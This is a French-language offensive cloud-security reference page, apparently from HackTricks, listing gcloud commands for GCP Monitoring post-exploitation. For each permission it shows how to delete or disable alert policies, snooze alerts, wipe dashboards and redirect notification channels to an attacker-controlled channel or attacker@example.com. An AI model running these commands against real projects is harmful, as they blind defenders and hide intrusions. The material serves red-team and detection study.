# GCP - Surveillance Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Surveillance

Pour plus d'informations, consultez :

{{#ref}}
../gcp-services/gcp-monitoring-enum.md
{{#endref}}

Pour d'autres moyens de perturber les journaux, consultez :

{{#ref}}
gcp-logging-post-exploitation.md
{{#endref}}

### `monitoring.alertPolicies.delete`

Supprimer une politique d'alerte :
```bash
gcloud alpha monitoring policies delete <policy>
```
### `monitoring.alertPolicies.update`

Perturber une politique d'alerte :
```bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled

# Remove all notification channels
gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels

# Chnage notification channels
gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

# Modify alert conditions
gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
# or use --policy-from-file <policy-file>
```
### `monitoring.dashboards.update`

Modifier un tableau de bord pour le perturber :
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''
```
### `monitoring.dashboards.delete`

Supprimer un tableau de bord :
```bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
```
### `monitoring.snoozes.create`

Empêcher les politiques de générer des alertes en créant un snoozer :
```bash
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
--start-time="2023-03-01T03:00:00.0-0500" \
--end-time="2023-03-07T23:59:59.5-0500"
```
### `monitoring.snoozes.update`

Mettez à jour le timing d'un snoozer pour éviter que des alertes ne soient créées lorsque l'attaquant est intéressé :
```bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME

# odify everything, including affected policies
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
```
### `monitoring.notificationChannels.delete`

Supprimer un canal configuré :
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
```
### `monitoring.notificationChannels.update`

Mettre à jour les étiquettes d'un canal pour le perturber :
```bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
```
{{#include ../../../banners/hacktricks-training.md}}
